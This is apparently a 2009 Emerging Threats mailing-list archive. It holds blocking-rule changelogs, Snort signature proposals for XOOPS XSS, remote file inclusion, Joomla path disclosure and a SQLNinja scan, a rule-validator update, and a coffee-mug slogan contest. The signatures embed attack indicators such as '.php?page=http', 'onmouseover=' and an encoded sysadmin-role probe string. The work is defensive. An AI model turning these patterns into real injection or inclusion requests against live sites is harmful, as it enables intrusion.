url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510344 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510345 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510346 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510347 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510348 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510349 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510350 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510351 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510352 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510353 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510354 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510355 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510356 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510357 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510358 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510359 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510360 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510361 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510362 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510363 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510364 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510365 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510366 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510367 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510368 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510369 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510370 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510371 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510372 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510373 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510374 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510375 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510376 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510377 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510378 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510379 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510380 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510381 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Removed from emerging-virus.rules (1): #disabling for now. this same payload seems to be used by a number of ping libraries From frank at knobbe.us Sat Aug 1 19:53:29 2009 From: frank at knobbe.us (Frank Knobbe) Date: Sat, 1 Aug 2009 18:53:29 -0500 Subject: [Emerging-Sigs] XOOPS viewpmsg.php and user.php XSS Sigs In-Reply-To: References: Message-ID: <20090801235329.GA58782@knobbe.us> On Sat, Aug 01, 2009 at 01:27:33AM +0100, Kevin Ross wrote: > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"Possible > XOOPS Viewpmesg.php Cross Site Scripting Attack"; > flow:to_server,established; uricontent:"/htdocs/modules/pm/viewpmsg.php"; > nocase; uricontent:" in URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; uricontent:""; nocase; classtype:web-application-attack; reference:url,ha.ckers.org/xss.html; sid:16000001; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= in URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"SRC="; nocase; classtype:web-application-attack; reference:url, ha.ckers.org/xss.html; sid:16000002; rev:1;) alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Onmouseover= in URI - Likely Cross Site Scripting Attempt"; flow:to_server,established; uricontent:"onmouseover="; nocase; classtype:web-application-attack; reference:url, www.w3schools.com/jsref/jsref_onmouseover.asp; sid:16000003; rev:1;) #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using path_escape"; flow:to_server,established; uricontent:".php?path_escape=http"; nocase; classtype:web-application-attack; sid:16000004; rev:1;) #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Two .php Extensions Together in URI, Possible Remote File Inclusion Attempt"; flow:to_server,established; uricontent:".php.php"; nocase; classtype:web-application-attack; reference:url, en.wikipedia.org/wiki/Remote_File_Inclusion; sid:16000005; rev:1;) #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using php?page="; flow:to_server,established; uricontent:".php?page=http"; nocase; classtype:web-application-attack; reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion; reference:url, projects.webappsec.org/Remote-File-Inclusion; sid:16000006; rev:1;) #alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB Possible Remote File Inclusion Attempt Using php?file="; flow:to_server,established; uricontent:".php?file=http"; nocase; classtype:web-application-attack; reference:url,en.wikipedia.org/wiki/Remote_File_Inclusion; reference:url, projects.webappsec.org/Remote-File-Inclusion; sid:16000007; rev:1;) Kevin -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/589b2b67/attachment.html From decoder at own-hero.net Wed Aug 5 04:44:27 2009 From: decoder at own-hero.net (decoder) Date: Wed, 05 Aug 2009 10:44:27 +0200 Subject: [Emerging-Sigs] Snortvalidator Update Message-ID: <4A79466B.50600@own-hero.net> Hi Matt :) after talking to rotorhead yesterday, I extended the snortvalidator script slightly. First of all, it warns when the flow keyword is used with different protocols than TCP because to my knowledge, at least older snorts do not support flow with for example UDP. Secondly, it validates all PCRE expressions by eval()ing the regex in perl and checking if perl throws an error. If this is the case, the script outputs perl's error message, which might be more informative than snort's messages. One important thing: In the older version, the flow keyword checker was not enabled at all, and I enabled it now. It found several SIDs where flow keywords are specified more than once, and threats them as _errors_. One example is here: alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN SQLNinja MSSQL Database User Rights Scan"; flow:to_server,established,established; content:"?param=a"; content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; classtype:attempted-recon; reference:url,sqlninja.sourceforge.net/index.html; reference:url,doc.emergingthreats.net/2009041; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; sid:2009041; rev:2;) As you can see there, flow says ":to_server,established,established". If you update the script, these rules will pop up as errors and they need to be fixed :) You can get the new version from the SVN. Cheers, Chris -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3471 bytes Desc: S/MIME Cryptographic Signature Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/0e533912/smime.bin From mail at mare-system.de Wed Aug 5 09:31:49 2009 From: mail at mare-system.de (mareadmin) Date: Wed, 05 Aug 2009 15:31:49 +0200 Subject: [Emerging-Sigs] some Joomal Path Disclosure vulnerabilities Message-ID: <4A7989C5.8080106@mare-system.de> joomla-Full Path Disclosure vulnerabilities some quite cheap ones alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> php5x.php"; flow:to_server,established; uricontent:"/libraries/joomla/utilities/compat/php50x.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334400; classtype:attempted-recon; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> ldap.php"; flow:to_server,established; uricontent:"/libraries/joomla/client/ldap.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334401; classtype:attempted-recon; rev:1;) alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"WEB Joomla Full Path Disclosure -> content.php"; flow:to_server,established; uricontent:"/libraries/joomla/html/html/content.php"; offset:0; nocase; reference:bugtraq,35780; reference:url,www.securityfocus.com/archive/1/505231; sid:1122334402; classtype:attempted-recon; rev:1;) -- mex MARE System Kiel .:. http://www.mare-system.de From jonkman at jonkmans.com Wed Aug 5 09:36:09 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 09:36:09 -0400 Subject: [Emerging-Sigs] Snortvalidator Update In-Reply-To: <4A79466B.50600@own-hero.net> References: <4A79466B.50600@own-hero.net> Message-ID: <4A798AC9.2010203@jonkmans.com> Spectacular! Thanks decoder. I'll get this added to the commit process asap and fix the errors it finds. Matt decoder wrote: > Hi Matt :) > > > after talking to rotorhead yesterday, I extended the snortvalidator > script slightly. First of all, it warns when the flow keyword is used > with different protocols than TCP because to my knowledge, at least > older snorts do not support flow with for example UDP. Secondly, it > validates all PCRE expressions by eval()ing the regex in perl and > checking if perl throws an error. If this is the case, the script > outputs perl's error message, which might be more informative than > snort's messages. > > > One important thing: In the older version, the flow keyword checker was > not enabled at all, and I enabled it now. It found several SIDs where > flow keywords are specified more than once, and threats them as > _errors_. One example is here: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLNinja MSSQL Database User Rights Scan"; > flow:to_server,established,established; content:"?param=a"; > content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; > classtype:attempted-recon; > reference:url,sqlninja.sourceforge.net/index.html; > reference:url,doc.emergingthreats.net/2009041; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; > sid:2009041; rev:2;) > > > As you can see there, flow says ":to_server,established,established". If > you update the script, these rules will pop up as errors and they need > to be fixed :) > > > You can get the new version from the SVN. > > > Cheers, > > > Chris > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Aug 5 09:41:24 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 09:41:24 -0400 Subject: [Emerging-Sigs] Emerging-sigs Digest, Vol 21, Issue 7 In-Reply-To: <1249462887.5841.14.camel@work> References: <1249462887.5841.14.camel@work> Message-ID: <4A798C04.5060000@jonkmans.com> Very funny, but we have a limit of maybe 5-10 words on a coffee mug unfortunately. Otherwise we'd have to have a magnifying glass to read it. :) We could commit this to the ruleset though and leave it disabled. See who notices... Matt Kayvan Javid wrote: > On Tue, 2009-08-04 at 12:00 -0400, > emerging-sigs-request at emergingthreats.net wrote: >> So lets make it a contest, the person that comes up with the best saying >> to put under the logo on the coffee mugs wins their choice of tshirt and >> the first coffee mug off the presses. Please send your ideas in to the >> list. It needs to be short enough to fit on a mug, but funny or profound >> in some way. :) >> Thanks >> Matt > > Nice contest, my first bash: > > alert me $INTERNAL_NET any -> 127.0.0.1 $MOUTH_PORTS (msg:"Mmmm > Coffee!"; flow:to_stomach,established; pcre:"(coffee|tea)"; > classtype:thirst-attack;reference:url,http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html; sid:l33t; rev:1;) > -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From jonkman at jonkmans.com Wed Aug 5 09:53:15 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 09:53:15 -0400 Subject: [Emerging-Sigs] Snortvalidator Update In-Reply-To: <4A79466B.50600@own-hero.net> References: <4A79466B.50600@own-hero.net> Message-ID: <4A798ECB.4000603@jonkmans.com> Have it integrated and it found two pcre's that were invalid that snort has been nice enough not to mention for the last 6 months they've stood... Thanks decoder, this really helps. Both pcre's are repaired and committed correctly now. Matt decoder wrote: > Hi Matt :) > > > after talking to rotorhead yesterday, I extended the snortvalidator > script slightly. First of all, it warns when the flow keyword is used > with different protocols than TCP because to my knowledge, at least > older snorts do not support flow with for example UDP. Secondly, it > validates all PCRE expressions by eval()ing the regex in perl and > checking if perl throws an error. If this is the case, the script > outputs perl's error message, which might be more informative than > snort's messages. > > > One important thing: In the older version, the flow keyword checker was > not enabled at all, and I enabled it now. It found several SIDs where > flow keywords are specified more than once, and threats them as > _errors_. One example is here: > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN > SQLNinja MSSQL Database User Rights Scan"; > flow:to_server,established,established; content:"?param=a"; > content:"if%20is%5Fsrvrolemember%28%27sysadmin"; distance:2; > classtype:attempted-recon; > reference:url,sqlninja.sourceforge.net/index.html; > reference:url,doc.emergingthreats.net/2009041; > reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_SQLNinja; > sid:2009041; rev:2;) > > > As you can see there, flow says ":to_server,established,established". If > you update the script, these rules will pop up as errors and they need > to be fixed :) > > > You can get the new version from the SVN. > > > Cheers, > > > Chris > > > ------------------------------------------------------------------------ > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From kayvan.javid at smoothwall.net Wed Aug 5 10:48:01 2009 From: kayvan.javid at smoothwall.net (Kayvan Javid) Date: Wed, 05 Aug 2009 15:48:01 +0100 Subject: [Emerging-Sigs] coffee slogan contest In-Reply-To: References: Message-ID: <1249483681.5841.28.camel@work> Bash #2: high load causes packet loss... take a break have a coffee or: while you enjoy the contents.... [ INSERT ET LOGO HERE ] let us deal with your network security or: your network is in good hands or: you drink coffee [ INSERT ET LOGO HERE ] we drink packets or: coffee tastes better when you know [ INSERT ET LOGO HERE ] is looking after your network or: you take a break... [INSERT ET LOGO HERE] we're on duty Hehe, think thats enough for now :) From jonkman at jonkmans.com Wed Aug 5 11:54:25 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 11:54:25 -0400 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> References: <4A78548C.9070208@jonkmans.com> <4A78B552.7050203@gmail.com> <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> Message-ID: <4A79AB31.5000009@jonkmans.com> This is definitely a leader in my mind as well. Short and sweet. Easy to print. Keep the ideas coming! Matt Salusky, William wrote: > Methinks Bobb has a winner there. Though probably just fine for snort > geeks if it were refined to simply read as: > > content: "|C0 FF EE|"; > > And the obligatory ET logo of course. ;) > > > W > > >> -----Original Message----- >> From: emerging-sigs-bounces at emergingthreats.net >> [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of harley >> Sent: Tuesday, August 04, 2009 6:25 PM >> To: Matt Jonkman Emerging Threats Signatures >> Subject: Re: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest >> >> Maybe for the coffee mug: >> alert ip any any -> $HOME_NET $MOUTH (content: "|C0 FF EE|";) >> >> >> >> >> Matt Jonkman wrote: >>> The first run of tshirts was a huge success, we sold every >> single one >>> and had orders backed up. Thanks everyone for both supporting the >>> project and being willing to be a human billboard to spread >> the word! >>> A second printing run of shirts just arrived. We have the >> usual black >>> and blue, by popular demand we now have white as well, and >> some larger >>> sizes as requested. They all look great, so please take a >> moment and >>> order one. What we make on these is going straight into new >> hardware >>> for the sandnet to allow us to process more samples and >> write more signatures! >>> We're also going to get coffee mugs and water bottles >> printed up, but >>> I'd like to see what everyone thinks for a saying on those. >> I'd rather >>> not just reproduce the tshirt saying on a mug, so I'd like to hear >>> what everyone thinks for these. >>> >>> So lets make it a contest, the person that comes up with the best >>> saying to put under the logo on the coffee mugs wins their >> choice of >>> tshirt and the first coffee mug off the presses. Please send your >>> ideas in to the list. It needs to be short enough to fit on >> a mug, but >>> funny or profound in some way. :) >>> >>> Get your tshirts here: >>> >> http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag. >>> html >>> >>> I'm looking forward to the ideas for the saying on the mugs. We may >>> even do a run of shirts with it if they keep selling! >>> >>> Thanks >>> >>> Matt >>> >>> >> _______________________________________________ >> Emerging-sigs mailing list >> Emerging-sigs at emergingthreats.net >> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs >> > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From guise.mcallaster at gmail.com Wed Aug 5 12:01:21 2009 From: guise.mcallaster at gmail.com (Guise McAllaster) Date: Wed, 5 Aug 2009 16:01:21 +0000 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <4A78548C.9070208@jonkmans.com> References: <4A78548C.9070208@jonkmans.com> Message-ID: Hi, Here are somes of my idea: ET: Our rule sets are not > 80 MB ET: Not only are we current, we aren't pre-compiled ET: Open source, not pre-compiled ET: Proud to have my sigs included in VRT ET: Sourcefire standing on my shoulders ET: We're not sellouts ET: All the rules fit to print If I win, please send my mug to Marty Roesch. Thanks. -Guise On Tue, Aug 4, 2009 at 3:32 PM, Matt Jonkman wrote: > The first run of tshirts was a huge success, we sold every single one > and had orders backed up. Thanks everyone for both supporting the > project and being willing to be a human billboard to spread the word! > > A second printing run of shirts just arrived. We have the usual black > and blue, by popular demand we now have white as well, and some larger > sizes as requested. They all look great, so please take a moment and > order one. What we make on these is going straight into new hardware for > the sandnet to allow us to process more samples and write more signatures! > > We're also going to get coffee mugs and water bottles printed up, but > I'd like to see what everyone thinks for a saying on those. I'd rather > not just reproduce the tshirt saying on a mug, so I'd like to hear what > everyone thinks for these. > > So lets make it a contest, the person that comes up with the best saying > to put under the logo on the coffee mugs wins their choice of tshirt and > the first coffee mug off the presses. Please send your ideas in to the > list. It needs to be short enough to fit on a mug, but funny or profound > in some way. :) > > Get your tshirts here: > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html > > I'm looking forward to the ideas for the saying on the mugs. We may even > do a run of shirts with it if they keep selling! > > Thanks > > Matt > > -- > -------------------------------------------- > Matthew Jonkman > Emerging Threats > Phone 765-429-0398 > Fax 312-264-0205 > http://www.emergingthreats.net > -------------------------------------------- > > PGP: http://www.jonkmans.com/mattjonkman.asc > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/f0122134/attachment.html From phatbuckett at gmail.com Wed Aug 5 12:11:34 2009 From: phatbuckett at gmail.com (Darren Spruell) Date: Wed, 5 Aug 2009 09:11:34 -0700 Subject: [Emerging-Sigs] various sigs In-Reply-To: References: Message-ID: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> On Wed, Aug 5, 2009 at 5:29 AM, Kevin Ross wrote: > Thoughts? I have disabled the ones which in some enviroments may cause high > load/false positives but they work. > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= in > URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; > uricontent:"SRC="; nocase; classtype:web-application-attack; > reference:url,ha.ckers.org/xss.html; sid:16000002; rev:1;) src= as a URI parameter I would expect to be extremely common. -- Darren Spruell phatbuckett at gmail.com From jamie.riden at gmail.com Wed Aug 5 13:25:12 2009 From: jamie.riden at gmail.com (Jamie Riden) Date: Wed, 5 Aug 2009 18:25:12 +0100 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <4A78548C.9070208@jonkmans.com> References: <4A78548C.9070208@jonkmans.com> Message-ID: <17b0fcab0908051025m6eda1011hcbb175d6c78a43c@mail.gmail.com> Don't ask me - I'm still waiting for my "snort: pulling people's arses out of the fire since 1999" T-shirt. (Strangely, no-one from sourcefire has taken me up on the suggestion.) cheers, Jamie 2009/8/4 Matt Jonkman : > The first run of tshirts was a huge success, we sold every single one > and had orders backed up. Thanks everyone for both supporting the > project and being willing to be a human billboard to spread the word! > > A second printing run of shirts just arrived. We have the usual black > and blue, by popular demand we now have white as well, and some larger > sizes as requested. They all look great, so please take a moment and > order one. What we make on these is going straight into new hardware for > the sandnet to allow us to process more samples and write more signatures! > > We're also going to get coffee mugs and water bottles printed up, but > I'd like to see what everyone thinks for a saying on those. I'd rather > not just reproduce the tshirt saying on a mug, so I'd like to hear what > everyone thinks for these. > > So lets make it a contest, the person that comes up with the best saying > to put under the logo on the coffee mugs wins their choice of tshirt and > the first coffee mug off the presses. Please send your ideas in to the > list. It needs to be short enough to fit on a mug, but funny or profound > in some way. :) > > Get your tshirts here: > http://www.emergingthreats.net/index.php/support-et-and-buy-et-schwag.html > > I'm looking forward to the ideas for the saying on the mugs. We may even > do a run of shirts with it if they keep selling! > > Thanks > > Matt From jonkman at jonkmans.com Wed Aug 5 13:42:30 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Wed, 05 Aug 2009 13:42:30 -0400 Subject: [Emerging-Sigs] To the Yahoo members we lost... Message-ID: <4A79C486.3010108@jonkmans.com> A reminder, if you know anyone that's using a yahoo email address to subscribe to this list please let them know they're likely no longer subscribed. Frequently we mention domain names or words that yahoo has blacklisted, they send a series of non-deliverable notices as it is discussed back to our mailing list manager, and it unsubscribes them. About 350 people were unsubscribed from yahoo addresses last night. Our deepest apologies, but please take it up with yahoo. We've had this issue for years. I recommend going gmail if you're not already there for your anonymous accounts. So please spread the word. I'll try to notify some as well. Matt -- -------------------------------------------- Matthew Jonkman Emerging Threats Open Information Security Foundation (OISF) Phone 765-429-0398 Fax 312-264-0205 http://www.emergingthreats.net http://www.openinformationsecurityfoundation.org -------------------------------------------- PGP: http://www.jonkmans.com/mattjonkman.asc From kevross33 at googlemail.com Wed Aug 5 14:07:00 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Wed, 5 Aug 2009 19:07:00 +0100 Subject: [Emerging-Sigs] various sigs In-Reply-To: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> References: <839aec700908050911p51d7134ex39d2fc0ca0a690f2@mail.gmail.com> Message-ID: Ok. I don't think I have seen it often but if so then it can be dropped as i won't be of any use. 2009/8/5 Darren Spruell > On Wed, Aug 5, 2009 at 5:29 AM, Kevin Ross > wrote: > > Thoughts? I have disabled the ones which in some enviroments may cause > high > > load/false positives but they work. > > > > alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB SRC= > in > > URI, Possible Cross Site Scripting Attempt"; flow:to_server,established; > > uricontent:"SRC="; nocase; classtype:web-application-attack; > > reference:url,ha.ckers.org/xss.html; sid:16000002; rev:1;) > > src= as a URI parameter I would expect to be extremely common. > > -- > Darren Spruell > phatbuckett at gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090805/27cce701/attachment.html From kevross33 at googlemail.com Wed Aug 5 14:10:09 2009 From: kevross33 at googlemail.com (Kevin Ross) Date: Wed, 5 Aug 2009 19:10:09 +0100 Subject: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest In-Reply-To: <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> References: <4A78548C.9070208@jonkmans.com> <4A78B552.7050203@gmail.com> <87BE69C18762B94EA631E9EF489CCB1F056B05@EVSMTC03.ad.office.aol.com> Message-ID: as it said my message bounced my suggestions were: 1) an emerging threat to coffee everywhere (a piggy one) 2) An analyst's coffee trough or: 3) content:"lots of"; content:"c|OFFE|e ="; dsize:>39; content:"inch waist"; Kev 2009/8/4 Salusky, William > Methinks Bobb has a winner there. Though probably just fine for snort > geeks if it were refined to simply read as: > > content: "|C0 FF EE|"; > > And the obligatory ET logo of course. ;) > > > W > > > > -----Original Message----- > > From: emerging-sigs-bounces at emergingthreats.net > > [mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of harley > > Sent: Tuesday, August 04, 2009 6:25 PM > > To: Matt Jonkman Emerging Threats Signatures > > Subject: Re: [Emerging-Sigs] More Tshirts, and a Coffee Mug Contest > > > > Maybe for the coffee mug: > > alert ip any any -> $HOME_NET $MOUTH (content: "|C0 FF EE|";) > > > > > > > > > > Matt Jonkman wrote: > > > The first run of tshirts was a huge success, we sold every > > single one > > > and had orders backed up. Thanks everyone for both supporting the > > > project and being willing to be a human billboard to spread > > the word! > > > > > > A second printing run of shirts just arrived. We have the > > usual black > > > and blue, by popular demand we now have white as well, and > > some larger > > > sizes as requested. They all look great, so please take a > > moment and > > > order one. What we make on these is going straight into new > > hardware > > > for the sandnet to allow us to process more samples and > > write more signatures! > > > > > > We're also going to get coffee mugs and water bottles > > printed up, but > > > I'd like to see what everyone thinks for a saying on those. > > I'd rather > > > not just reproduce the tshirt saying on a mug, so I'd like to hear > > > what everyone thinks for these. > > > > > > So lets make it a contest, the person that comes up with the best > > > saying to put under the logo on the coffee mugs wins their > > choice of > > > tshirt and the first coffee mug off the presses. Please send your > > > ideas in to the list. It needs to be short enough to fit on > > a mug, but > > 